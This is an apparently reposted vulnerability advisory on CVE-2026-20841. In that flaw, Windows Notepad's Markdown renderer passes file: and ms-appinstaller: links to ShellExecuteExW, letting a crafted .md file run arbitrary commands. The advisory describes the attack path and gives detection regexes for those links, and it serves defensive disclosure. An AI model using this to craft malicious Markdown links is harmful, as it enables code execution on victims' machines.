In this excerpt of a TrendAI Research Services vulnerability report, Nikolai Skliarenko and Yazhi Wang of the TrendAI Research team detail a recently patched command injection vulnerability in the Windows Notepad application. This bug was originally discovered by Cristian Papa and Alasdair Gorniak of Delta Obscura. Successful exploitation of this vulnerability could result in the execution of arbitrary commands in the security context of the victim’s account. The following is a portion of their write-up covering CVE-2026-20841, with a few minimal modifications.
A remote code execution vulnerability has been reported in Microsoft Windows Notepad. The vulnerability is due to improper validation of links in Markdown files.
A remote attacker could exploit this vulnerability by enticing the victim to download and interact with a malicious file. Successful exploitation of this vulnerability could result in the execution of arbitrary commands in the security context of the victim’s account.
The Vulnerability
Microsoft Windows comes with a default text-editing application called Windows Notepad. Historically, this application offered only minimal editing features. However, modern versions of Windows include an improved and extended Notepad by default. This new version supports multiple file formats, Markdown rendering, and Copilot-enhanced features.
Markdown is a lightweight markup language that allows users to create formatted text using a simple syntax. It is widely used for writing documents, blog posts, and README files. It supports a wide range of formatting options, including (but not limited to) headers, styled text, numbered and bulleted lists, and links. Markdown supports two main link formats: standard and inline. The standard link format is:
[link-name](link/path)
When rendered, only the link text (“link-name”) is shown to the user.
The inline links use the following format:
<link/path>
When rendered, they are transformed into the equivalent standard link:
[link/path](link/path)
A remote code execution vulnerability has been reported in Microsoft Windows Notepad. The vulnerability is due to improper validation of links when handling Markdown files.
When Notepad opens a file, if the application detects that the file requires special rendering (in this case, Markdown), the input file is tokenized. Tokenization in this context means splitting the raw file text into a sequence of small, recognizable pieces (“tokens”) that the renderer can process one by one. Detection is performed based on the file extension. Only the “.md” extension was found to trigger Markdown rendering, as the application uses a fixed string comparison to determine whether Markdown should be rendered by calling sub_1400ED5D0(). Markdown files are rendered token by token.
Function sub_140170F60() handles clicking on links in Markdown files. It filters the link value, and passes it to ShellExecuteExW() call.
The filtering performed on the link is found to be insufficient, as it allows using malicious crafted protocol URIs, such as “file://” and “ms-appinstaller://”, to execute arbitrary files in the security context of victim. ShellExecuteExW() uses the configured protocol handlers and may expose additional exploitable protocols depending on the system configuration.
A remote attacker could exploit this vulnerability by enticing the victim to download a malicious crafted Markdown file, open it, and click on a malicious link. Successful exploitation of this vulnerability could result in the execution of arbitrary commands in the security context of the victim’s account.
Notes
• Files using the “.md” file extension are not registered to be opened by Notepad by default. However, when opened manually in Notepad, they are rendered as Markdown, which allows the vulnerability to be triggered.
• Any “\” sequences are converted to “” in the attacker-controlled link path prior to passing it to the ShellExecuteExW() call.
Source Code Walkthrough
The following code snippet was taken from Notepad.exe version 11.2508. Comments added by TrendAI researchers have been highlighted.
In sub_140170F60():
Detection Guidance
To detect an attack exploiting this vulnerability, the detection device must monitor and parse traffic on the following application protocols that can be used to deliver an attack to exploit this vulnerability:
• FTP, over ports 21/TCP, 20/TCP
• HTTP, over port 80/TCP
• HTTPS, over port 443/TCP
• IMAP, over port 143/TCP
• NFS, over ports 2049/TCP, 2049/UDP, 111/TCP, 111/UDP
• POP3, over port 110/TCP
• SMTP, over ports 25/TCP, 587/TCP
• SMB/CIFS, over ports 139/TCP, 445/TCP
The detection device must inspect traffic transferring a Markdown file with the file extension “.md”. If such a file transfer is found, the detection device must search the file content for links.
The detection device must check whether the link paths contain the strings “file:” or “ms-appinstaller:”.
If “file:” was found, the detection device must search the Markdown file contents using the following case-insensitive regular expression:
(x3C|[[^x5d]+]()file:(x2f|x5cx5c)4
If “ms-appinstaller:” was found, the detection device must search the Markdown file contents using the following case-insensitive regular expression:
(x3C|[[^x5d]+]()ms-appinstaller:(x2f|x5cx5c)2
If any of the regular expressions matches, the link contains a path to a remote resource. The traffic must be considered malicious; an attack exploiting this vulnerability is likely underway. This guidance should also detect the public PoC that was recently posted on GitHub.
Notes
• The string matches are case-insensitive.
• The detection guidance is based on the vendor-provided patch. However, the patch restricts the links to local-only files and HTTP(S) URIs, which may result in a huge number of false positives. Because of that, the detection guidance focuses on formats that may access and execute remote files. Due to that, it may result in false negatives.
• The vulnerable function uses the configured protocol handlers and may expose additional exploitable protocols depending on the system configuration.
Conclusion
This vulnerability was patched by Microsoft in the February 2026 release cycle. They note no workarounds but do list user interaction as a prerequisite to exploitation. To fully remediate the vulnerability, the proper action is to test and deploy the provided vendor patch.
Special thanks to Nikolai Skliarenko and Yazhi Wang of the TrendAI Research team for providing such a thorough analysis of this vulnerability. For an overview of TrendAI Research services please visit https://go.trendmicro.com/tis/vulnerabilities.html.
The threat research team will be back with other great vulnerability analysis reports in the future. Until then, follow the team on Twitter, Mastodon, LinkedIn, or Bluesky for the latest in exploit techniques and security patches.
–
Read More – Zero Day Initiative – Blog
